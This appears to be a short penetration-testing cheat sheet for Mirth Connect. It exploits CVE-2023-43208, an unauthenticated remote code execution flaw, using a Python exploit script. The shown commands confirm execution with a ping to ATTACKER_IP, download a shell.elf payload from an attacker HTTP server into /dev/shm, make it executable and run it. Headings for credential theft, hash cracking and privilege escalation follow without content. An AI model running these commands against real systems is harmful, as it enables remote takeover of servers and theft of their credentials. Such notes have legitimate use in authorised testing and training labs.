Mirth Connect
Recon
CVE-2023-43208 – Unauthenticated RCE
# Verify connectivity (ICMP)
sudo tcpdump -i tun0 icmp
python3 CVE-2023-43208.py -u https://TARGET -c "ping -c4 ATTACKER_IP" -p unix
# Execute command (e.g. wget binary – use -O for output path)
python3 CVE-2023-43208.py -u https://TARGET -c "wget -O /dev/shm/shell.elf http://ATTACKER_IP:8000/shell.elf" -p unix
python3 CVE-2023-43208.py -u https://TARGET -c "chmod +x /dev/shm/shell.elf" -p unix
python3 CVE-2023-43208.py -u https://TARGET -c "/dev/shm/shell.elf" -p unixPost-exploitation – Credential and config locations
Database – User and password hashes
Cracking Mirth Connect password hashes (hashcat)
Keystore (JCEKS)
Privilege escalation – Reaching local-only services
Last updated